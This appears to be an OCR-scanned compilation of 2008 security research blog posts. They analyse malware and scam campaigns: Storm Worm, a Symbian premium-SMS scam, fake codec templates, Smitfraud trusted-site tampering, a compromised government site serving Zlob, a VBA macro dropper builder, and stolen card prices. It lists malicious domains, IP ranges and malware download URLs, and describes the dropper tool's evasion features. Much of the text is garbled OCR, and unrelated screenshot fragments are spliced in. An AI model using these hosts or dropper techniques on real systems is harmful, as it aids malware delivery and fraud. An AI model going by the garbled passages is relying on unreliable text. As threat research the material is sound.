C HactpodKamn NpOrpaNMs NOMOKEM. 


Haw ICQ: 629093105 


2012-2013 © Mobile 777 


Onyn tenedoroe 
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Stay tuned! 
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17.9.24 Shots from the Wild West - Random Cybercrime Ecosystem Screenshots 
2021 - An OSINT Analysis - Part Four (2021-09-30 02:36) 


An image is worth a thousand words. 
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Nloporou ppyr! 
Mpumu Cambie “cKpeHHue no3svApaBneHna 
C HaCTynNaloLuMM HOBbIM room! 

NMyctb Hoppin ron nogaput Bam | 
6narononyune, UCnNonHeHMe 3aBeTHOU 
MeUTbI VU yKpennT Bepy B 6bynyluee. 


NyctTb ycnex conyTcTByeT BCeM 
BawiumM HauWHaHMaoM BCerfa UM BO BCeM. 


X{enato Bam Mupa, cornacua, TepneHunay 


Ho6pa, cuacTbsA uv, KOHEYHO Ke, ymauu! 


rs CHosbim rogom f£ 


. C yBaxKeHnen, 


>») Komanaa Serggik00&Ko 


elORBKO nna Bac, cKugKa Ha ycnyru 
"Typuctuveckoro HanpasneHua 


‘e, LY 20S 
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makeloveforever .com 
bellestarfireworks .com 
yourfireworks .com 
worldbestfireworks .com 
greatfireworkslaws .com 
dailydotnews .com 
dotdailynews .com 
wholovedirect .com 
newsworldnow .com 
thefireworksjuly .com 
grupogaleria .cn 
polkerdesign .cn 
nationwide2u .cn 
activeware .cn 
grupogaleria .cn 
likethisonel .com 
lollypopycandy .com 
nationwide2u .cn 
polkerdesign .cn 
verynicebank .com 
thefireworksjuly .com 
wholefireworksonline .com 
worldbestfireworks .com 
yourfireworks .com 


bellestarfireworks .com 
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dayfireworkssite .com 
greatfireworkslaws .com 


yourfireworksstore .com 


The "best" is yet to come. 


Related posts : 

[2]Storm Worm Hosting Pharmaceutical Scams 
[3]All You Need is Storm Worm’s Love 
[4]Social Engineering and Malware 

[5]Storm Worm Switching Propagation Vectors 
[6]Storm Worm’s use of Dropped Domains 
[7]Offensive Storm Worm Obfuscation 
[8]Storm Worm’s Fast Flux Networks 

[9]Storm Worm’s St. Valentine Campaign 
[10]Storm Worm’s DDoS Attitude 

[11]Riders on the Storm Worm 


[12]The Storm Worm Malware Back in the Game 


. http://blogs.zdnet.com/security/?p=1440 
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1 


. http: //ddanchev. blogspot .com/2007/01/social-engineering-and-malware.htm 
. http: //ddanchev.blogspot.com/2007/02/storm-worm-switching-propagation. htm 


obfuscation.htm 


. http: //ddanchev.blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 


. http: //ddanchev.blogspot . com/2008/05/storm-worm-hosting-pharmaceutical-scams.htm 


. http: //ddanchev. blogspot. com/2008/05/al1l-you-need-is-storm-worms-love.htm 


1 


. http: //ddanchev.blogspot .com/2007/08/storm-worms-use-of-dropped-domains. htm 
. http://ddanchev. blogspot .com/2007/08/offensive-storm-worm- 


. http: //ddanchev.blogspot .com/2008/01/storm-worms- st-valentine-campaign.htm 


. http://ddanchev. blogspot .com/2007/09/storm-worms-ddos-attitude.htm 
. http://ddanchev. blogspot .com/2007/12/riders-on-storm-worm. htm 
12. http://ddanchev. blogspot .com/2007/08/storm-worm-malware-back- in-game. htm 
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4.7.11 Mobile Malware Scam iSexPlayer Wants Your Money (2008-07-09 14:42) 


A bogus media player (iSexPlayer.jar) targeting Symbian S60 3rd edition devices according 
to several affected parties, is currently being spammed through blackhat search engine 
optimization. Once infected upon confirming its execution since it’s doesn’t seem to be 
exploiting a specific vulnerability besides "bargain hunters" desire for free adult material, the 
malware attempts to trick the user into participating by becoming a member, however, a 
quick peek the source code reveals interesting facts about the scam. 


For instance, once providing them with your credit card details and basically wanting to 
try out the service, it appears that there’s no way out of it which is a problem since "Trial mem- 
bership recur at $US 29.95 unless cancelled, Monthly membership recur unless cancelled" 
and also, "Do you want full access to all pictures and videos? Cost is 2 Euros, charged 100 % 
descreet on your phone bill over SMS. Please allow iSexPlayer to send SMS". 
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File Name 4} 


a.ciass 


1979] 5 3 57 Pm 


b.class 811 3/19/2008 1:57 PM 53% 
back png 21925 21915 3/19/2008 1:57 PM 0% 
c.class 300 441 3/19/2008 1:57 PM 32% 
d.class 3129 7500 3/19/2008 1:57PM 58% 
e.class 396 626 3/19/2008 1:57 PM 37% 
Easyloader.class 10151 23569 3/19/2008 1:57 PM 57% 
fclass 127 205 3/19/2008 1:57 PM 38% 
fullaccess3.png 3226 3221 3/19/2008 1:57 PM 0% 
g.class 231 306 3/19/2008 1:57 PM 25% 
h.class 904 1763 3/19/2008 1:57 PM 49% 
Lclass 174 225 3419/2008 1:57 PM 23% 
icon.png 582 577 3/19/2008 1:57 PM -1% 
j.class 1461 3263 3/19/2008 1:57 PM 55% 
kclass 2042 4221 3/19/2008 1:57 PM 52% 
Lelass 1448 2966 3/19/2008 1:57 PM 51% 
logo.png 9851 9846 3/19/2008 1:57 PM 0% 
m.class 336 504 3/19/2008 1:57 PM 33% 
MANIFEST, MF 187 288 3/19/2008 1:57 PM 35% META-INF\ 
n.class 83 87 3/19/2008 1:57 PM 5% 
o.class 935 1932 3/19/2008 1:57 PM §2% 
p.class 1592 3313 3/19/2008 1:57 PM 52% 
g.class 248 361 3/19/2008 1:57 PM 31% 
rclass 1630 3298 3/19/2008 1:57 PM 51% 
$.class 102 109 3/19/2008 1:57 PM 6% 
tclass 828 1441 3/19/2008 1:57 PM 43% 


The spammed through blackhat SEO sites are currently active, and perhaps a bit ironic, once 
you make any transaction with these people, anything that goes on at a later stage such as 
automatic calling or sms-sing to squeeze your bill, may be in fact legal since you authorized it. 


[1]Symbian Freak has some details, as well as [2]an affected party : 


"Last week, | had lend my N73 to one of my friends for use as he had lost his phone. I 
did not know what he did, but I checked my bills today and see some International 
calls made that amount to around 20USD. That is around 800 Indian rupees. To 
check, | called the number and learnt that it was a phone sex line. Now it was time for my 
friend to answer. The thirteen calls were made during a period spanning two days. 
On an average there were 7 calls a day. Now, the thing that struck me is, going 
by the call records, the calls on the second day were made when | had the phone 
with me. | am pretty sure no one dialled the numbers. | called my buddy and asked him if he 
had downloaded something. He then spilled the beans informing that he did go to some adult 
website and installed a software (I do not recall the name)." 
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0 MPEASAKA3SY 
40% ot Apple Store 


[pv nokynke bonee 2x EAMHUL, TOBapa CKMAKM BCeM 


MoKHo 3aKa3aTb n1060u ToBap Ha (Amazon, ebay) — nvuwute B NMYKYy 


*[lpv o6bemax — MHAMBMAYaNbHble yonoBuA 


16529 


16530 


16531 


16532 


The name of the "software" as I’ve already pointed out is iSexPlayer. Let’s dissect the 
scammers and their sites currently soammed across 100,000 sites using blackhat SEO tactics. 
Related domains sharing the same IP and internal pages : 


3g6.se 
3gx.se 
conn2.3g6.se 
conn2.3g6.se 
test.3gx.se 


83.241.194.132 (83.241.194.128-83.241.194.191 DGC-DIRECT2-01 Direct2Internet AB - 
Internet Access Located in Johanneshov, Sweden) 


3g6.se/dstream.php 
3g6.se/newplayerdl.php 
3g6.se/chrono/callback.php 
secure.chronopay.com/index.cgi 


The scammer’s pitch : 


"Free access to: - 500 Hardcore scenes - 100 Full lenght movies - Picture galleries Im- 
portant! To install isexplayer you must be at least 18 years old. You must install and run 
iSexplayer™ access module to watch the videos on Nintendo DS, You must install and run 
iSexplayer™ access module to watch the videos on Apple iPhone, Install iSexplayer" 


Upon attempting to download the .jar file from the mobile page, the iSexPlayer.php does the 
magic like that : 


"MIDlet-1: iSexPlayer,/icon.png,Easyloader 

MlDlet-Install-Notify: http://3g6.se/install _notify.php?id=1322451 
MiDlet-Jar-Size: 101313 

MIDlet-Jar-URL: http://396.se/iSexPlayer.jar 

MIDlet-Name: iSexPlayer 

MIDlet-Vendor: Vendor 
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[Gecnnatxo] Galaxy Legend 


B 284] rogy 8 pesynbTaTe OCBOEHHA aNnekKHx MNaHET HaYaNach HOBSA SNOXa B HCTOPHK 
HENOBEYECTES. OKASASBWICh 6 QSKTACTHYECKOM MHP@ 3araQOK, KATH it 
BOSMOMHOCTEH, MIDOK NPHMET KOMAMMOBSHME PaNaKkTHYECKOM SacTaBoM, Senyueit 
GopeSy 28 enacts. Sto GygeT KenpocTo: npyaeTca MOSinNaOHaTE Bce cHnel, UTOSE! 
OTPasHTb YAaPbl HENPHATENEH, MaKAYWIMX BSWETO YHHYTOKEHHA, 


Crauato: 


Android: http://vi.cc/3cUdGH 
iPhone: http://itunes.appler.com.ru/SHSS 


OTreeTuTs NogenuTecs 


Mme HDaenTce 
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MIDlet-Version: 1.0 
MicroEdition-Configuration: CLDC-1.0 
MicroEdition-Profile: MIDP-2.0 

did: 1322451 

did2: 9416755" 


Who's behind the scam? 


"C_Javax _microedition Icdui Form _fld.append("\niSexPlayer is owned by: "); 

Cc _javax microedition Icdui Form _fld.append("\nEnit Invest S.L. "); 

Cc _javax microedition Icdui Form _fld.append("\nweb: enitinvest.com "); 

Cc _javax microedition Icdui Form _fld.append("\nemail: support@enitinvest.com "); 
Cc _javax microedition Icdui Form _fld.append("\nTel: 1-800-845-4951 ");" 


Enit Invest S.L. 

Av. Machupichu 26, S 18 
28043 Madrid 

email: support@enitinvest.com 
Tel: 1-800-845-4951 


Welcome 


Welcome to Free Wap Porn 

No more small chps with low quality! 

Here you can wew many hours of FULL LENGTH, HIGH QUALITY PORN! 
Simply install the FullLength Viewer and follow the link to watch the porn! 
Install FullLength Viewer 


Click here after you have installed the wewer 


And since I’m sure that there are more juicy details within the source code further exposing 
their scammy practices, which you should not authorize in any way, just like you wouldn't really 
like making a long call on a premium rate number thanks to having a malware infected phone, 
once more details are gathered, particularly its compatibility with devices, they’ll be posted. 


1. http://www.symbian-freak.com/news/008/07/first_known_s60_3rd_ed_malware.htm 


2. http://www.esato.com/board/viewtopic.php?topic=171238 
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4.7.12 The Template-ization of Malware Serving Sites (2008-07-10 18:40) 


ActiveX Obgect Enter 


Video ActiveX Object Exros! 


Your browser cannot display fis video fe 


‘You need to download new version of 
0 Act ct to view this video file 


Just like web [1]malware [2]exploitation [3]kits and [4]phishing pages turned into a commodity 
underground good, allowing easy [5]localization to different languages, and of course, the 
natural lowering of entry barriers into web malware and phishing in general, the very same 
thing is happening with fake ActiveX templates like the ones used on [6]the majority of fake 
porn and celebrity sites I’ve been assessing recently. 


The increase of these bogus ActiveX templates is due to the fact that despite they are 
currently available for sale, buyers appear to be leaking them for everyone to use so that they 
can continue maintaining their current business models, namely, the services they offer with 
the Activex templates. Unethical competitive practices among cybercriminals and scammers 
are only to starting to take place with one another trying to ruin or extend the lifecycle of their 
services. 


Talking about prevalence, the TonsOfPorn ActiveX remains the most widely used rogue 
ActiveX in the majority of fake codec campaigns for the last couple of months. The Activex is 
largely abused by using another fake porn site template for PornTube, which in combination 
result in nothing more than huge domain portfolios with no content at all if we exclude the 
Zlob variants. 


And while template-tization means more efficient malware campaigns, it also results in 
a common pattern for generic detection of such sites. For instance, the folks at [7]Finjan did 
an experiment by verifying the signature based detection of the common javascript file that 
was used in the ongoing waves of SQL injection attacks. Their conclusion : 
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"Can it be that Anti-virus products are now holding more signatures for domains and 
URLs rather than trying to identify a malicious code they never inspected before? As my 
research found, just by changing the domain names, some AVs did not find this code as 


Malicious...... 


surprisingly enough." 


File b.js received on 06.30.2008 14:19:07 (CET) 
Current status 


finished 


Result 10/33 (30.31%) 


Microsofe 
NODS2v2 
Norman 
Panda 
Prevxi 
Rising 
Sophos 
Sunbelt 
Symantec 
TheHacker 


4er6 
cre 


Tren 
VBA32 
VsrusBuster 


Webwasher-Gateway 


Pret resuts & 
Version Last Update Result 
2008.6.27.2 2006.06.30 - 
7.8.0.59 2008.06.30 HEUR/ETML.Malware 
5.1.0.4 2008.0 JS/agent.Gi 
4.8.2195. - 
7 2068.06.36 Trojen.iFreme.On 
9. C - 
0.93.1 08.06.30 - 
4.44.0.09% 08.06.30 - 
7.0 0 0008.06.29 - 
31.6.5914 €.06.30 - 
4. - 
$-4.4.56 0608.06.29 JS/Agent.Gi 
7.60.13502.0 2008.06.26 HIML/Explosc! iFrame.G 
3.14.6.6 2068.06.30 = 
2.6.7306.2623 2008.06.36 Trojan-Sownloader.JS.Agent.ccv 
73.1.1. 2é 2068.06.30 - 
7.0.6.128 2008.06.30 Trojan-Downloader.JS.Agent.ccv 
$327 2008.06.27 - 
1.3704 2008.06.30 Trojan: JS/Redirector.N 
3226 00 ) - 
5.60.02 HIML/Exploic!IFrame.G 
9.0.0.4 20 - 
V2 20 - 
20.53.02 20 - 
4.30.6 20 30 = 
3.6.2176.2 2068.06. - 
1 20 &. - 
€.2.96.364 2008.06.28 - 
6.700.0.1004 2008.06.30 - 
3.12.6.€ 2008.06.30 - 
4.5.11.0 2008.06.30 = 
6.6.2 2068.06.30 Heuristic. 5IML.Malware 
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When assessing malware campaigns in general, | usually do the same for the record. Storm 
Worm’s use of ind.php for executing its set of exploits has the same detection rate - scanners 
result: 10/33 (30.30 %) and is detected as JS.Zhelatin.zb. 


Getting back to the TonsOfPorn ActiveX, it’s structure is more static than a Red Army 
statue in Estonia, making it easy to proactively protect against, no matter the domain, no 
matter the exploits served. It’s detection rate is close to the javascript from the SQL injection 
attacks - Scanners Result: 9/33 (27.28 %) and is detected as Trojan.HTML.Zlob.L. 


From my personal experience, blocking an IP address where a couple of hundred mali- 
cious domains remain parked, is just as useful as blocking a single domain acting as the 
main redirector behind a huge domains portfolio of malicious domains. However, the most 
beneficial approach on a large scale remains the practice of taking care of the most obvious 
patterns that still remain faily easy to detect, at least for the time being, due to the efficiency 
the people behind them aim to achieve, making them easily susceptible to generic detection 
approaches. 


1. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 
2. http: //ddanchev. blogspot .com/2008/05/icepack-exploitation-kit-localized-to.htm 
3. http: //ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 


4, netp://ddanchev. blogspot .con/7008/09/phishing pages for-every-bank-are. tal 
5, http: / /Adanchev. blogspot .com/2008/02/local izing-cybercrine-cultural. neal 

6. : : : - i - ing- - : 
7. 


ttp://ddanchev. blogspot .com/2008/07/fake-porn-sites-serving-malware-part.htm 
http: //www.finjan.com/MCRCblog.aspx?EntryId=199 


4.7.13 Violating OPSEC for Increasing the Probability of Malware Infection 
(2008-07-11 22:04) 
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Money transfer is: 


Tracking Number 
Recipient 
Country 

Payout 


| Status 
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A fatal error in IE has occured at 6628:C@@11E36 in UXD UMM<@1> 
6661GE36. Error was caused by Trojan-Spy.HIML.Smitfraud.c 


» System can not function in normal mode. 
Please check you security settings. 


* S$can your PC with any avaliable antivirus / spyware remover 
program to fix the problen. 


Are malware authors and the rest of the participants in fact willing to violate their OPSEC 
(operational security) for the sake of increasing the probability of successful malware infection 
by on purposely lowering down the security settings of Internet Explorer, by adding their 
malicious netblocks and domains into "Trusted Sites"? You bet. 


The infamous Smitfraud or PSGuard Desktop Hijacker, has been cooperating with known 
malicious parties for over an year now, a cooperation which exposes interesting relatinships 
between the usual suspects. Starting from the basic fact that a malware infected host is 
infected with many other totally unrelated to one another pieces of malware, Smitfraud’s 
"ore-infection foreplay" demonstrates that they are willing to sacrifice operational security in 
order to increaes the probabilty of future infections on the same host. 


Rogue software added as trusted sites upon Smitfraud infection : 
about-adult .net 
antivirus-scanner .com 


best-porncollection .com 


getadultaccess .com 
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getavideonow .com 
ieantivirus .com 
malwarebell .com 
mega-soft-2008 .com 
mooncodec .com 
movsonline .com 
ruler-cash .com 
s-freeware .com 
sexysoftwaredom .com 
supersoft21freeware .com 
the-programsportal .com 
vwwredtube .com 
wetsoftwares .com 
youpornztube .com 
securewebinfo .com 
safetyincludes .com 
securemanaging .com 
myflydirect .com 
onlinevideosoftex .com 
scanner.malwscan .com 
scanner.shredderscan .com 
sex18tube2008 .com 
spywareisolator .com 
virus-scanner-online .com 


security-scanner-online .com 
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virus-scanonline .com 
antivirus-scanonline .com 
topantivirus-scan .com 
topvirusscan .com 
virus-detection-scanner .com 
antivirus-scanner .com 
infectionscanner .com 
internet-security-antivirus .com 
hotvid44 .com 

opaadownload .com 


somenudefuck .com 


Rogue netblocks and IPs added as trusted IP ranges upon Smitfraud infection : 


"69.50.*.*" 


"69,.31.*.*" 


"66.235.*,*" 


"66.230.*.*" 


"216.239.*.*" 


"205.188.*,*" 


"205.177.*.*" 


"195.225,*,*" 


"216.195.*,*" 


"82,179.*.*" 


"81,95.*.*" 


"70.84.*,*" 
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DRAG* PASS F3 


STOT NayHx pabotaeT! HO NpeAYCMOTPUTeNbHO 3aKpbiBaeTCA NepesA TEMU PEMCaMM KOTOPbie 
Taku OCTaNnucb NeTaTb))) Tak YTO B Hero HE NoONacTb 
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"195,95,.*,*" 
"194.187.*,*" 
"78.129.158.*" 
"78.129.166.*" 
"89,149.226.*" 
"195,.93.218.*" 
"72.21.53.* 
"81,9.3.*" 
"213.189.27.*" 
"88.255.74.*" 
"79,.143.178.*" 
"202.71.102.*" 
"64.202.189.170" 


"217.170.77.150" 


The second hardcoded trusted IP is also responding to : 
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Internet Options 


General Security | Privacy | Content | Connections Programs | Advanced | 


Select a zone to view or change security settings. 


Security level for this zone 


@ @&@ Y 9 


Internet Local intranet QWErn ies Restricted 
sites 


Trusted sites 


This zone contains websites that you 
trust not to damage your computer or 
your Files. 


Allowed levels for this zone: All 
| ~ Medium-high 
- Appropriate For most websites 
- Prompts before downloading potentially unsafe 
content 
- Unsigned Activex controls will not be downloaded 


Custom level... Default level 
Reset all zones to default level 


virusisolator .com 
virus-isolator .org 
virus-isolator .net 
soft-collections .com 
viruswebprotect .com 
virus-isolator .us 
codecvideo2008-18 .com 
sextubecodec55 .com 
sextubecodec67 .com 
soft-archives .com 


soft-collections .com 
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codecreviews .com 


codecvideo2008-18 .com 


Such practices leave a great deal of malicious creativity, for instance, once rented a bot- 
net’s already infected malware PCs could start trusting the majority of sites in their scammy 
ecosystem. What’s great is that by doing this they expose their affiliations with these affiliate 
based rogue security software programs, next to their infrastructure on which they may be 
that easily claiming ownership. 


4.7.14 Monetizing Compromised Web Sites (2008-07-14 09:15) 


CAMARA MUNICIPAL DE AMPARO 
ESTADO DE SAO PAULO 


O poder begisiativo ¢ o poder Ge legsiar, criar lens 


No sistema de trés poderes proposte por Montesquieu, o poder legslative ¢ representado pelos 
legsiadores, homens que devem elaborar as les que regulam o Estado, O poder legislative na 
maona das repdbicas @ monarqaas ¢ constitulde por um comgresso, parlamento, assembitias ou 
cémaras 


© cdjetivo do poder legsiative 4 elaborar normas Ge Greito de abrangincia geral (ou, raramente, 
de abrangincia indvidual) que so estabelecidas acs cidadSos ou 25 insttuigdes pobicas mas suas 
felacbes reciprocas. 


Em regmes ditatorias 0 poder legulativo ¢ exercido pelo préprin ditader ou por Camara legulativa nomeada por ele. 
Entre as funcdes elementares do poder legsiativo ests a de fiscakzar o poder executive, votar lens orcamentérias, ¢, em situacdes especificas, pagar 
determnadas pessoas, como o Presidente da Republica ou os prépnos membros da assembidis 

Nossa meta 


© Poder Legslative Amparense std sempre procuramde colocar a disposicso da populacko mformacies relatwas 45 maténas legslativas assim com 
apresentando os trabathos dos Serfores Parlamentares 


No dia 30 de malo, o presidente da Cimara Murscipal, vereador Mino Ancona esteve partkipando do semininio “Camirhos para o Desenvolvimento 
Sustentével” promovide pela UVESP - Unido dos Vereadores do Estado de S30 Paulo, no muricipio de Ranchana. A Sessko Solene de abertura contow 
com a presenca do Sr. Alberto Cesar Centeio de Araujo, Prefeito Murecipal, do Sr, Pedro de Lima Pinto, Presidente da Cimara Muricipal, do Sr, Osmarine 
Leite, vereader @ dretor da UVESP @ do Presidente da UVESP, Sr, Sebastibo Misiara. Foram abordades os seguintes assuntos: “Apresentacdo do video 
institucional do Ranch Moet Canra®. “Proietn Versace Freeeenderine 2008" (nalectrante: Se. bin Cheer Mexante - Coevuites rin SFRRAF-SP). "OQ cw BM 


Despite that pure patriotic hacktivism is still alive and kicking, [1]compromised sites are largely 
getting monetized these days, starting from hosting blackhat SEO junk pages, to redirecting 
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to live exploit URLs and fake codecs where revenue is earned through their participation in an 
affiliate business model. 


With The Africa Middle Market Fund’s site monetized by web site defacers who defaced 
it "in between" the blackhat SEO infrastructure they were hosting internally, in this I’ll com- 
ment on the currently compromised and redirection to a fake porn sites, Camara Municipal 
de Amparo (camaraamparo.sp.gov.br/r.html). Basically, it’s homepage is heavily linking 
to the Zlob variant (camaraamparo.sp.gov.br/ video.exe) in between loading an IFRAME 
to 61.162.230.12/ index.php. As always, upon uploading their redirector, they’ve build 
enough confidence into their new hosting provider that the link to the redirector was instantly 
spammed across the web. The site is so heavily linking to the internal redirector itself, that 
upon clicking on the majority of links the user will inevitably come across it. 


Speaking of fake porn sites redirecting to Zlob variants, here are the very latest addi- 
tions spammed across the web through blackhat SEO practices : 
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just-tube .com 
mypornmovies .net 
moms-galls .net 
porntubefilms .com 
porntubedot .com 
hot-porntube .com 
landmovieblog .com 
sexvidtube .com 
freelifevideo .com 
getyourfreemovie .com 
iubat .com 


sweetyjoly .com 
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just-tube.com 
blog.com 
vet 
porntubefilms.com 
porntubedot.com 
hot-porntube.com 
landmovieblog.com 
landmovieblog.com 


log.com 


hardbizarre.com 
landmovieblog.com 
landmovieblog.com 
landmovieblog.com 
porntubelcon.net 
landmovieblog.com 
landmovieblog,com 
Ffuckedolde 
highprot.com 
raf.com.pl 
grandsupertds. info 
hot-porn-tube.net 
hot-porntube,.com 


just-tube.com 


porntubefilms.com 
porntubedot,com 


freeworldvideo,net 
hot-porntube, net 
qualitymoy 
porntubelcon.net 


video-info.net 


fuckedolder.com 
highproi.com 


grandsupertds. info 
hot-porn-tube.net 
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hardbizarre .com 
freeworldvideo .net 
hot-porntube .net 
qualitymovies .net 
porntubelcon .net 
video-info .net 
videocityblog .com 
fuckedolder .com 
highprol .com 
max-graf.com .pl 
grandsupertds .info 
hot-porn-tube .net 
hot-porntube .com 
terryschulz .com 
show-sextube .com 
qualitymovies .net 


clubvideos .net 


No matter the high profile site that’s been exploited in order to participate in such mali- 
cious operations, for the time being, crunching out new domain names and using the hosting 
services of the well known ISPs neglecting their removal, seems to be the tactic of choice. The 
long tail of SQL injected sites is however, clearly replacing the plain simple blackhat SEO web 
spamming, so that traffic to these rogue sites is driven through redirection of the the traffic 
from legitimate sites. 


1. http: //ddanchev. blogspot .com/2008/06/monetizing-web-site-defacements. htm 
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4.7.15 Malware and Office Documents Joining Forces (2008-07-14 17:06) 


Nytb ana pacnakosKu EXE-palina Ha KomnbIOTepe NonbSsoBaTena: 


C:\Windows\S ystem32\qmnghsas. exe 


AlononHuTenbHble OnuWh: —————$——————————— 
a ABTO-NOWCK NaNnky OA pacnakoBKu: | whip32.exe | 


wl Boipag coo6weHiA MaKpoOcoM B TEKCT QOKYMEHTA: 
TexHep HPOBaTb Makpo-Kog ANA: 


O Mic 007) ® Microsoft Word (97 - 2007) 


Common office files as documents, presentations, spreadsheets and PDF files, are the most 
widely abused ones in targeted attacks, which when backed up with enough personal infor- 
mation and take into consideration the time of their attack if the social engineering campaign 
is either going to be based on a current/upcoming event, or on an event anticipated due 
to information gathered through open source intelligence, often make it through common 
signature based scanning solutions. 


Despite the relatively easy to obtain, point’n’click [1]DIY tools for backdooring common 
office files are available for the script kiddies to take advantage of, some are [2]naturally 
remaining proprietary tools, making them harder to analyze unless a copy is obtained. Like 
this one, generating "undetected" by signatures based scanning, office documents and 
spreadsheets that would drop the actual malware on the PC. 


Automatic translation of its description and core features : 
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"The program represents a generator macros in the language Visual Basic for Applica- 
tion (VBA), for introduction in the document Microsoft Office Word / Microsoft Office Excel 
executable file (win32 exe), followed by fully automatic recovery and launch, without any 
additional action by the user. The only requirement that formed in such a way xls / doc files 
is to support VBA macros on the computer end-user formed file and permission to launch 
macros. 


The program uses NOT a vulnerability (exploit) or macro-virus tools for the introduction, 
extraction or running embedded files. This means that it has generated macros compatible 
with ALL versions of Microsoft Office products starting with Microsoft Office 97 package, with 
any established "patches" and the service pack. Macros generated by this program not 
detected antivirus, for the simple reason that they are not viruses or macro viruses. The 
program uses only "established" means products built into Microsoft Excel VBA language to 
achieve their goals. 


- Fully automatic generation of macro for the introduction of documents word / excel 
any given exe-file with his persistence in the body and subsequent documents automatic 
recovery and launch, when opening a document word / excel. 


- Generated macros are compatible with all versions of ms word / excel since version 97, 
employments and regardless of the presence / absence of any patches / servicepacs. 


- Generated macros are not macro-viruses, exploits do not use and do not contain any 
malicious code, so do not be detected by any antivirus tools as viruses. 


- Conversion body ex-file macro happening in such a way that while in doc / xls file it 
not detected any antivirus, and can be freely sent by mail safely passed all checks, even if in 
itself contains viral code defined antivirus. 


- Sgenerirovanny and attached to the body of the document macro can be protected 
with a password or signed certificate, using funds established Microsoft Office, which does not 
affect him productivity or efficiency (macro, in any case remain fully workable). 


- Box macro can be made both in the new document, and in any document containing 
data and-or other macros. Generated program code is fully compatible with any other 
embedded in the document macros or entering data, and will not interfere with their work, as 
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NpusetcTayem BOC YVBOXQGEMbIe NOAbSOBATEAM Prod. : 
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well as maintain its efficiency. 


- Added auto-finding ways to extract exe-file; 


- Added possibility of a macro arbitrary text in the body of the instrument; 


- Optimized algorithm macro-generation code; 
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Enabling this option will lead to the creation macro code, who himself will find a way to unpack 


and run embedded exe-file. Auto-search finds the current user folder and produces there 
extraction and launch embedded file. The peculiarity of this method is that this method will 


work on the computers of users with a limited account, because in its user folder in any case 
has the right to record / performance. Using this option is justified to improve the "punching" 


macro on computers with limited account or unknown file structure (let Windows installed on 


the disk is different from C). 


You can specify a name for final file independently, or leave blank, then the name will 


be generated automatically. 
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Whonix-Gateway [Pa6oraer] - Oracle VM VirtualBox 


Mawuna Bug Yetposctaa Cnpasxa 
AKw& whonixcheck | Whonix-Gateway | &.2-debpackagel | Wed Aug 27 12:09:26 UTC 2014 yD 


whonixcheck has not been completed for more than one day. Running whonixcheck again in 452 seconds (randomly chosen)... 


The delay is a security feature. which is documented here: 
https y/wew.whonix.org/wikifwhoniecheck 


You can also cancel waiting and start whonixcheck right away by double clicking on the whonixcheck icon or 
entering *whonixcheck* in a terminal emulator (such as Konsole). 


Checking Tor Connection, Tor Browser Version, Operating System Updates, Whonix Version, Whonkx News... 


This wil happen in background and will take approximately three minutes... 
& cancel | , 
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On this possibility has asked for a user program, its essence is that after running a macro, 
retrieval and downloading exe-file the document with the introduction of exe-file will be 
withdrawn posed text. Perhaps in this way can improve the application of social engineering, 
designed to force the user to allow support for macros. For example, in the text of the 
document indicate: 


"This document contains hidden text (password, a system of calculation formulas, inter- 
active components, etc.), Which can be viewed only after the inclusion of support macros. 
Please enable support for macros and re-opening this document ". 


After resolving support macros, and the implementation of embedded exe-file, the docu- 
ment will be withdrawn given a string containing probable "password" or any other textual 
information. " 


Despite that the tool is proprietary, the underground economy’s leaks are largely driven by 
bargain hunters who would exchange proprietary tool, whose often biased exclusiveness may 
increase the profit margins, for a service or a good that may be worthless for them in general, 
but impossible to obtain and take advantage of in the present. It will not just leak in one 
way or another, someone will inevitably backdoor the backdooring tool and trick the novice 
bargain hunters into running it, by having both their host infected and money taken. 


Related posts: 

[3]The Underground Economy’s Supply of Goods and Services 
[4]Yet Another DIY Proprietary Malware Builder 

[5]The Small Pack Web Malware Exploitation Kit - Proprietary 
[6]DIY Exploit Embedding Tool - A Proprietary Release 


[7]Skype Spamming Tool in the Wild - Proprietary Release 


1. ft tp: / Fw f-secure, con/veblog/archives/00001450, heal 
2. netp: //ddanchev.plogapot.com/2007/10/Aynanice-of-nalvare- industry heal 

3, htep://Adenchev,blogapot, con/2001 /09/undexgroud~ econonye-oupply-of goods ht 
4. netp:/ /ddanchev. blogspot .con/2008/05/yetanother™diy-propristary-nalvare hes] 


5. http: //ddanchev.blogspot.com/2008/05/small-pack-web-malware-exploitation-kit.htm 
6. http: //ddanchev. blogspot . com/2008/04/diy-exploit-embedding-tool-proprietary .htm 


7. http://ddanchev. blogspot . com/2008/04/skype-spamming-tool-in-wild.htm 
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4.7.16 Are Stolen Credit Card Details Getting Cheaper? (2008-07-15 20:08) 


eta Is (1)=£60 
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id master card (1)=¢6 


price 
Bank logir of no fi price 

\EU bank log ? no fi price 

} Track1 anc ck: th balance of €3 
track1 and tr 2 with balance of 1,7 


What is shaping the prices of stolen credit card details? The investments the cybercriminals 
or real life scammers ( through [1]credit card cloning or [2]JATM skimming) put into the 
process of obtaining the details, or can we even talk about investments being made where an 
experienced scammer has just purchased 1GB of raw credit cards data from a novice botnet 
master who isn’t really aware of the actual value of his "botnet output"? 


Depends on which economic theory you believe in, or whether or not you'll take the 
"bottom-up approach" or the "top-down" one. And since I’m not aware of the existence of 
"the invisible hand of the underground market" and centralized power to increase the supply 
or decrease it to boost prices for the stolen credit card details, also indicating the existence of 
underground cartels putting everyone in a "price taker" position. 


The basics of demand and supply for anything underground will always apply unless of 
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course, The more they want, the cheaper it gets, the less they want, the higher the price on 
per credit card basis gets, since the investment on behalf of the malicious party that originally 
stolen them is virtually the same, and he can theoretically break-even in every single case 
since the credit card details were obtained efficiently. It’s up to the seller to follow or entirely 
ignore economic behavior, and do what they feel like doing with this good which must on 
the other hand reach its market liquidity as soon as possible, else it becomes obsolete. The 
current market model can be further explained as a good example of competitive equilibrium : 


"Competitive market equilibrium is the traditional concept of economic equilibrium, ap- 
propriate for the analysis of commodity markets with flexible prices and many traders, 
and serving as the benchmark of efficiency in economic analysis. It relies crucially on 
the assumption of a competitive environment where each trader decides upon a 
quantity that is so small compared to the total quantity traded in the market that 
their individual transactions have no influence on the prices." 


This can be easily explained in a single sentence - it’s a mess and every participant is 
doing whatever they want to, so generalizing on the prices charged for stolen credit card 
numbers would be unrealistic, since it’s the price a single seller with no real impact on the 
"average" market price for the same good. As for the average market price itself, it would be 
hard to measure it depending on the quality of the sample you want to rely on, since this is a 
type of market where sellers don’t have to report price changes in their goods for the purpose 
of statistical research. 


